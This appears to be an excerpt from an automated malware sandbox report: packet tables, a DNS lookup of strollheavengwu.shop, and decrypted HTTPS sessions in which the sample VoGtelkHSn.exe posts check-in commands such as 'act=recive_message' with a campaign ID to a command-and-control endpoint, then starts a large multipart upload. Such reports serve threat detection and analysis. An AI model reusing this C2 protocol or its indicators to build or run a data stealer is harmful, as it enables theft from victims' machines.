Apr 26, 2024 05:44:03.630789042 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.632325888 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.632477999 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.632512093 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.632586956 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.632596016 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.345459938 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.345751047 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.345763922 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.345807076 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.567754030 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.567831993 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.567944050 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.568308115 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.568341017 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.892745018 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.892913103 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.894273996 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.894304991 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.895374060 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:04.896698952 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.896805048 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:04.896837950 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.570768118 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.571094036 CEST	443	49709	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.571197987 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.571197987 CEST	49709	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.637646914 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.637691975 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.637800932 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.638317108 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.638336897 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.952519894 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.952616930 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.954346895 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.954359055 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.955374002 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:05.956712008 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.956815004 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:05.956820965 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:06.613959074 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:06.614239931 CEST	443	49710	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:06.614278078 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:06.614332914 CEST	49710	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.286608934 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.286693096 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.286782026 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.287198067 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.287229061 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.597851992 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.597965956 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.599329948 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.599370003 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.599701881 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.600987911 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.601772070 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.601814985 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.601950884 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.601993084 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.602148056 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.602189064 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.602351904 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.602399111 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.602590084 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.602664948 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.602876902 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.602926970 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.602946997 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.602988958 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.603107929 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.603148937 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.603200912 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.603231907 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.603316069 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.644161940 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.644383907 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.644496918 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.644548893 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.644589901 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.644670963 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.644721985 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:07.644737005 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:07.644746065 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:09.631021023 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:09.631257057 CEST	443	49711	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:09.631341934 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:09.631417036 CEST	49711	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:09.631454945 CEST	443	49711	172.67.163.209	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 05:43:58.725100994 CEST	57412	53	192.168.2.5	1.1.1.1
Apr 26, 2024 05:43:58.881438971 CEST	53	57412	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 05:43:58.725100994 CEST	192.168.2.5	1.1.1.1	0xef4c	Standard query (0)	strollheavengwu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 05:43:58.881438971 CEST	1.1.1.1	192.168.2.5	0xef4c	No error (0)	strollheavengwu.shop		172.67.163.209	A (IP address)	IN (0x0001)	false
Apr 26, 2024 05:43:58.881438971 CEST	1.1.1.1	192.168.2.5	0xef4c	No error (0)	strollheavengwu.shop		104.21.15.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

strollheavengwu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:43:59 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: strollheavengwu.shop
2024-04-26 03:43:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-04-26 03:43:59 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:43:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jf736j210ujrd72kb5tn3si2fl; expires=Mon, 19-Aug-2024 21:30:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdSVO91mOYFpKavHsvgt5K0LAAGBGyJZZr5DUeQSCyb1wfEj32Z4V4JAoGtsw%2FWT5mXkI%2FvcVW0Y8D4JkKcG3flVNu%2Bg39pv69oBQr5nKcWYAfpINIvw7a39P415ArCqoZega0Q1vA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a3925c9c2c67da-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:43:59 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-04-26 03:43:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:00 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 58 Host: strollheavengwu.shop
2024-04-26 03:44:00 UTC	58	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 73 74 61 72 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--superstar&j=default
2024-04-26 03:44:00 UTC	812	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 03:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u3tvbenup47bu8hjpaj8l0ecuu; expires=Mon, 19-Aug-2024 21:30:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQDci4GkR1E3OqKx2ZrYiTuK1iDS34k2d7YEujnMUgzMnBo8M2pK9h%2FfLTi52N0jlyFjlq9vkEq4IxvKLe43eoKuNzT%2FAyY7%2BdvNzKTHRhGl%2FMR3LijWBwdEcPm93SL2kMf%2FpvEZxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a392633f4b74a6-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 03:44:00 UTC	557	IN	Data Raw: 35 30 63 0d 0a 55 67 72 69 54 63 39 51 56 43 32 53 4d 55 55 6c 36 44 4e 6c 69 78 64 31 72 45 43 71 6c 73 4e 6e 69 6e 37 58 6c 71 36 37 5a 4f 67 70 41 4f 74 76 75 58 4a 75 44 61 59 64 54 79 7a 4b 51 41 43 70 4c 56 58 59 4d 74 2f 7a 37 32 32 44 58 4c 62 79 6a 49 46 45 6a 6a 4e 6d 6b 53 6a 6a 57 6c 30 50 2f 30 6c 6e 48 38 68 6f 62 34 4a 73 66 36 56 4a 69 50 4f 74 52 62 42 65 39 65 48 4c 32 51 47 51 4a 6d 2b 4d 50 71 59 2f 4f 6d 33 2f 56 44 46 45 68 56 49 57 34 44 6b 63 77 32 4b 47 6e 4d 70 75 71 42 75 74 74 4a 53 62 52 71 55 33 66 6f 4d 41 72 69 4d 2f 44 37 34 37 54 43 7a 4b 56 68 47 70 4c 56 57 4f 48 49 6a 6d 6f 68 58 72 45 36 54 4b 6a 49 45 66 74 48 42 6a 6c 69 69 39 4d 53 42 45 2f 56 38 32 65 63 6f 4a 55 37 73 6e 52 5a 78 77 31 37 54 4a 62 76 64 30 33 73 Data Ascii: 50cUgriTc9QVC2SMUUl6DNlixd1rECqlsNnin7Xlq67ZOgpAOtvuXJuDaYdTyzKQACpLVXYMt/z722DXLbyjIFEjjNmkSjjWl0P/0lnH8hob4Jsf6VJiPOtRbBe9eHL2QGQJm+MPqY/Om3/VDFEhVIW4Dkcw2KGnMpuqButtJSbRqU3foMAriM/D747TCzKVhGpLVWOHIjmohXrE6TKjIEftHBjlii9MSBE/V82ecoJU7snRZxw17TJbvd03s
2024-04-26 03:44:00 UTC	742	IN	Data Raw: 52 6f 30 38 4b 4e 68 74 37 54 51 34 54 76 31 54 4e 55 2b 42 57 67 4c 37 66 68 37 44 4c 38 6a 35 71 77 72 72 48 4c 4c 2b 78 74 59 4d 6a 6a 31 6c 68 69 2b 74 63 6e 67 6e 6d 7a 68 6e 51 4a 49 52 58 36 73 31 4e 4d 73 79 7a 2f 69 33 52 39 4a 63 33 5a 2f 54 6c 32 33 49 63 67 44 72 4e 73 56 5a 58 51 2f 33 58 32 63 66 79 42 45 50 37 48 59 55 78 53 33 4c 2f 4b 6f 58 36 41 36 7a 2b 63 6e 4c 41 49 38 2b 59 6f 4d 39 70 7a 77 77 54 50 6c 59 4c 6b 4b 4e 56 55 65 6e 48 58 79 6c 59 73 2f 73 34 56 32 71 58 4a 54 35 78 39 55 4d 6e 54 41 6f 36 45 53 79 66 46 34 6b 36 54 74 4d 4c 4d 70 57 43 36 6b 74 56 59 34 6d 79 66 43 67 41 65 59 53 73 66 6a 4b 31 77 75 46 4e 6d 4b 41 4b 4b 63 36 50 6b 37 39 57 43 68 48 6a 31 77 44 37 33 6b 57 79 32 4b 47 6e 4d 70 75 71 42 75 74 74 4a 53 Data Ascii: Ro08KNht7TQ4Tv1TNU+BWgL7fh7DL8j5qwrrHLL+xtYMjj1lhi+tcngnmzhnQJIRX6s1NMsyz/i3R9Jc3Z/Tl23IcgDrNsVZXQ/3X2cfyBEP7HYUxS3L/KoX6A6z+cnLAI8+YoM9pzwwTPlYLkKNVUenHXylYs/s4V2qXJT5x9UMnTAo6ESyfF4k6TtMLMpWC6ktVY4myfCgAeYSsfjK1wuFNmKAKKc6Pk79WChHj1wD73kWy2KGnMpuqButtJS
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 33 35 64 38 0d 0a 4f 44 34 76 34 54 70 48 37 6e 6c 58 6c 6d 43 49 38 71 30 41 35 78 4b 31 2b 73 33 55 41 49 34 39 61 4a 49 70 76 7a 55 33 54 50 4e 56 49 6b 4f 4b 55 41 4c 73 63 52 2f 4b 4c 73 65 30 37 32 32 44 64 2f 58 7a 31 4a 6c 65 79 48 42 48 6c 79 47 37 4f 53 4a 49 34 45 49 64 42 62 39 53 43 65 64 79 41 59 35 4b 6f 2b 76 76 62 59 4d 46 33 5a 2b 6e 6d 51 47 47 63 44 44 43 62 36 51 67 4a 45 76 32 57 43 78 56 6d 46 73 44 36 48 51 51 77 53 50 44 38 61 30 50 34 78 69 6e 2f 4d 58 61 46 49 34 77 59 34 6f 70 37 58 78 65 4a 4a 73 54 49 46 2f 4b 43 55 57 70 55 52 72 65 4c 73 50 69 70 68 58 64 48 37 76 36 79 38 39 47 34 6c 74 33 7a 6b 66 47 4b 31 34 6b 6d 78 4d 67 53 38 6f 4a 52 61 6c 36 47 4d 45 71 79 50 57 6c 43 4f 77 64 75 50 6a 46 32 67 71 47 4f 47 57 4d 4b Data Ascii: 35d8OD4v4TpH7nlXlmCI8q0A5xK1+s3UAI49aJIpvzU3TPNVIkOKUALscR/KLse0722Dd/Xz1JleyHBHlyG7OSJI4EIdBb9SCedyAY5Ko+vvbYMF3Z+nmQGGcDDCb6QgJEv2WCxVmFsD6HQQwSPD8a0P4xin/MXaFI4wY4op7XxeJJsTIF/KCUWpURreLsPiphXdH7v6y89G4lt3zkfGK14kmxMgS8oJRal6GMEqyPWlCOwduPjF2gqGOGWMK
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 45 2f 42 45 53 52 49 52 66 41 50 38 31 66 36 55 39 68 70 7a 4b 48 49 42 33 33 72 54 4c 31 55 62 53 63 69 69 50 4c 71 41 34 50 55 48 38 55 69 64 44 69 56 73 48 35 6e 41 52 78 69 76 49 35 71 59 4b 36 52 32 2b 2f 38 48 58 41 34 73 31 62 38 42 68 78 56 6c 64 44 2f 64 4c 5a 78 2f 49 45 53 72 41 54 31 65 6d 53 64 65 36 79 57 37 78 64 4e 36 66 6a 4e 34 4b 79 6d 67 71 77 43 75 6e 4d 6a 74 46 2b 31 77 6b 51 49 52 52 43 75 4e 6e 48 38 34 69 78 76 4b 67 43 65 30 64 75 66 66 65 31 51 43 48 4e 6d 43 53 62 2b 4e 61 58 53 53 77 56 44 38 48 30 68 4e 48 79 58 34 62 7a 53 37 4a 38 2b 4d 6b 34 68 2b 2b 2b 49 37 73 42 59 51 2b 62 35 5a 76 78 56 6b 70 41 5a 67 34 50 69 2f 68 4f 6b 66 75 65 56 65 57 59 49 6a 77 70 51 6e 6f 47 37 76 77 79 74 51 42 67 54 31 69 68 79 4f 6b 4f 6a Data Ascii: E/BESRIRfAP81f6U9hpzKHIB33rTL1UbSciiPLqA4PUH8UidDiVsH5nARxivI5qYK6R2+/8HXA4s1b8BhxVldD/dLZx/IESrAT1emSde6yW7xdN6fjN4KymgqwCunMjtF+1wkQIRRCuNnH84ixvKgCe0duffe1QCHNmCSb+NaXSSwVD8H0hNHyX4bzS7J8+Mk4h+++I7sBYQ+b5ZvxVkpAZg4Pi/hOkfueVeWYIjwpQnoG7vwytQBgT1ihyOkOj
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 4a 6b 4f 47 57 77 48 71 64 68 6a 42 4c 63 43 30 37 32 32 44 64 2f 58 7a 31 4a 6c 65 79 48 42 4e 6c 79 53 6a 4e 48 59 6e 6d 30 78 70 4c 2b 46 49 62 34 49 65 56 38 6b 75 69 4b 7a 6a 52 65 51 56 73 2f 4c 4a 31 51 65 4d 4f 47 32 49 4b 36 77 30 4d 45 7a 2f 56 79 4a 47 68 56 55 4c 35 33 38 57 7a 79 37 44 2b 36 6f 41 71 46 4c 64 6e 36 65 5a 41 5a 4a 77 4d 4d 4a 76 6e 44 45 67 57 4f 42 66 5a 79 2f 68 54 6b 6d 42 48 67 36 6d 53 61 4f 30 70 67 6d 6f 52 50 65 30 7a 63 73 4d 67 44 35 74 6a 79 71 75 50 54 46 43 39 6c 38 74 54 6f 4a 58 43 4f 42 6e 46 4d 49 73 7a 2f 71 74 43 2b 55 57 74 76 6d 4d 6c 32 37 68 57 79 69 48 4e 2b 31 71 64 41 2f 63 56 43 70 70 67 56 30 41 71 52 31 38 30 57 79 67 6e 37 68 74 67 33 66 31 38 38 43 5a 58 73 68 77 5a 49 6f 6a 70 44 49 2f 53 76 68 Data Ascii: JkOGWwHqdhjBLcC0722Dd/Xz1JleyHBNlySjNHYnm0xpL+FIb4IeV8kuiKzjReQVs/LJ1QeMOG2IK6w0MEz/VyJGhVUL538Wzy7D+6oAqFLdn6eZAZJwMMJvnDEgWOBfZy/hTkmBHg6mSaO0pgmoRPe0zcsMgD5tjyquPTFC9l8tToJXCOBnFMIsz/qtC+UWtvmMl27hWyiHN+1qdA/cVCppgV0AqR180Wygn7htg3f188CZXshwZIojpDI/Svh
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 56 34 56 36 48 6f 65 79 53 6e 46 2b 36 38 41 35 67 36 79 2f 38 66 52 44 34 51 32 4b 4d 35 48 78 6c 6c 32 53 4f 67 54 66 77 58 4b 5a 77 54 6e 66 67 62 42 49 63 53 30 79 57 37 33 55 74 32 66 31 62 46 74 34 58 42 76 6a 47 2f 31 63 48 5a 44 2f 6c 4d 6f 53 34 5a 61 44 2b 68 35 47 63 6b 6e 77 66 79 70 46 2b 6b 59 76 66 58 43 31 67 65 4f 4e 57 32 45 4b 4b 6b 30 4f 51 2b 2b 4f 30 77 73 79 6c 59 66 71 53 31 56 6a 67 33 50 34 59 41 2f 71 48 54 65 36 34 4b 78 62 5a 4e 59 41 2b 74 76 71 6a 35 32 46 37 49 54 4c 55 79 4f 55 67 50 73 65 68 62 50 4a 4e 72 7a 71 42 66 6d 45 62 72 38 78 4e 41 48 6a 6a 56 6c 68 69 4f 6e 4d 7a 46 42 2f 6c 74 6e 43 65 49 36 62 4b 6c 79 44 34 35 36 69 72 53 41 46 66 4d 4f 6f 2f 6e 74 31 41 6e 4b 57 41 4f 66 59 63 56 5a 4c 79 65 62 4f 47 64 41 Data Ascii: V4V6HoeySnF+68A5g6y/8fRD4Q2KM5Hxll2SOgTfwXKZwTnfgbBIcS0yW73Ut2f1bFt4XBvjG/1cHZD/lMoS4ZaD+h5GcknwfypF+kYvfXC1geONW2EKKk0OQ++O0wsylYfqS1Vjg3P4YA/qHTe64KxbZNYA+tvqj52F7ITLUyOUgPsehbPJNrzqBfmEbr8xNAHjjVlhiOnMzFB/ltnCeI6bKlyD456irSAFfMOo/nt1AnKWAOfYcVZLyebOGdA
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 42 31 45 38 51 76 7a 2f 53 6b 43 4f 30 59 75 2f 44 4c 32 51 71 46 4e 32 43 50 4b 36 30 39 64 67 47 59 4f 45 77 48 6a 55 6c 48 73 54 64 58 37 69 6e 65 31 61 38 4f 2b 6c 7a 64 6e 39 4f 58 62 75 45 70 41 4f 74 45 37 54 55 36 44 36 67 52 5a 30 6d 44 55 41 2f 6e 65 52 2f 4b 4d 4d 6a 2f 71 41 72 70 45 37 58 33 7a 64 4d 4f 6d 44 5a 6f 69 79 65 71 4f 6a 4a 42 34 6c 49 6f 42 38 51 35 62 49 49 31 45 4e 5a 69 6b 4c 62 68 4e 50 34 62 73 76 75 4f 38 41 47 52 4d 57 4b 44 4a 4b 46 79 58 69 54 76 48 55 38 73 6b 7a 6c 73 67 6a 55 51 77 6d 4b 51 74 75 45 49 35 42 47 78 35 73 44 5a 42 6f 4d 33 59 70 49 67 6f 6a 38 31 54 2f 56 42 4a 6c 57 46 57 67 4c 71 63 52 6a 42 4c 73 44 2b 34 55 75 41 64 39 36 30 79 38 46 47 30 6e 49 6f 72 43 79 38 4f 48 52 6f 36 6b 55 67 53 35 74 61 43 Data Ascii: B1E8Qvz/SkCO0Yu/DL2QqFN2CPK609dgGYOEwHjUlHsTdX7ine1a8O+lzdn9OXbuEpAOtE7TU6D6gRZ0mDUA/neR/KMMj/qArpE7X3zdMOmDZoiyeqOjJB4lIoB8Q5bII1ENZikLbhNP4bsvuO8AGRMWKDJKFyXiTvHU8skzlsgjUQwmKQtuEI5BGx5sDZBoM3YpIgoj81T/VBJlWFWgLqcRjBLsD+4UuAd960y8FG0nIorCy8OHRo6kUgS5taC
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 4f 41 64 2f 69 71 78 36 6f 64 4e 37 72 67 72 46 74 6b 31 67 44 36 32 2b 71 50 6e 59 58 73 68 4d 71 51 49 52 5a 41 65 64 7a 42 63 49 74 7a 76 53 67 44 2b 55 51 76 76 50 43 30 67 43 50 50 57 69 47 4b 61 6b 32 4d 6b 48 7a 45 32 6b 76 34 54 70 48 37 6d 31 58 6c 6d 43 49 30 34 77 30 71 6a 2b 69 34 73 62 65 43 70 77 37 61 59 4d 35 6f 43 4a 32 4a 35 74 4d 61 53 2f 68 53 47 2b 43 48 6c 66 4a 4c 6f 69 73 34 30 58 6a 45 72 44 31 77 4e 4d 42 68 43 4a 70 69 69 4f 73 4e 54 46 45 34 6c 67 31 54 49 4a 53 43 65 46 38 46 38 41 69 79 66 6d 68 52 61 5a 30 33 70 2b 4d 33 68 37 4b 61 43 72 41 43 6f 34 6c 49 45 57 79 63 44 42 52 67 46 59 4c 2f 33 34 57 7a 54 54 46 35 4f 46 74 67 77 50 37 6e 4b 66 41 62 75 46 62 4b 49 63 6a 37 57 70 30 44 2f 74 63 4b 55 71 42 56 51 37 73 66 52 Data Ascii: OAd/iqx6odN7rgrFtk1gD62+qPnYXshMqQIRZAedzBcItzvSgD+UQvvPC0gCPPWiGKak2MkHzE2kv4TpH7m1XlmCI04w0qj+i4sbeCpw7aYM5oCJ2J5tMaS/hSG+CHlfJLois40XjErD1wNMBhCJpiiOsNTFE4lg1TIJSCeF8F8AiyfmhRaZ03p+M3h7KaCrACo4lIEWycDBRgFYL/34WzTTF5OFtgwP7nKfAbuFbKIcj7Wp0D/tcKUqBVQ7sfR
2024-04-26 03:44:00 UTC	1369	IN	Data Raw: 38 4c 42 46 73 46 37 6c 70 70 65 4d 56 64 31 67 4f 75 68 45 73 6e 78 65 4a 4f 6b 37 54 43 7a 4b 52 30 65 78 4e 30 57 41 53 71 4f 66 34 52 65 6f 52 50 65 30 69 39 63 4c 69 7a 4e 6d 67 7a 32 2f 4e 44 56 5a 38 78 51 5a 65 61 74 63 44 4f 56 34 47 4d 55 63 39 74 57 73 44 75 51 52 75 76 2f 79 35 78 4f 4a 50 6d 61 48 4f 62 78 79 65 43 65 62 4f 47 64 49 79 67 6c 46 30 44 56 66 6a 68 32 47 6e 4d 70 75 71 41 54 31 72 49 36 5a 4d 34 6b 2b 5a 6f 63 35 76 48 38 58 51 76 74 66 4b 6b 69 42 45 55 6d 42 48 6e 79 4f 4a 49 69 73 34 31 57 6d 64 4e 36 66 6a 4e 30 58 79 6d 67 71 30 48 33 32 5a 32 55 59 6f 41 46 50 4c 4a 55 66 62 34 4a 73 66 36 56 4a 69 4f 4c 68 58 61 70 4f 2b 35 79 6e 73 6b 61 59 63 44 44 43 62 2b 6f 78 4a 46 33 32 55 44 46 45 7a 57 38 35 79 6d 49 42 78 44 6d Data Ascii: 8LBFsF7lppeMVd1gOuhEsnxeJOk7TCzKR0exN0WASqOf4ReoRPe0i9cLizNmgz2/NDVZ8xQZeatcDOV4GMUc9tWsDuQRuv/y5xOJPmaHObxyeCebOGdIyglF0DVfjh2GnMpuqAT1rI6ZM4k+Zoc5vH8XQvtfKkiBEUmBHnyOJIis41WmdN6fjN0Xymgq0H32Z2UYoAFPLJUfb4Jsf6VJiOLhXapO+5ynskaYcDDCb+oxJF32UDFEzW85ymIBxDm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	172.67.163.209	443	5444	C:\Users\user\Desktop\VoGtelkHSn.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 03:44:01 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12839 Host: strollheavengwu.shop
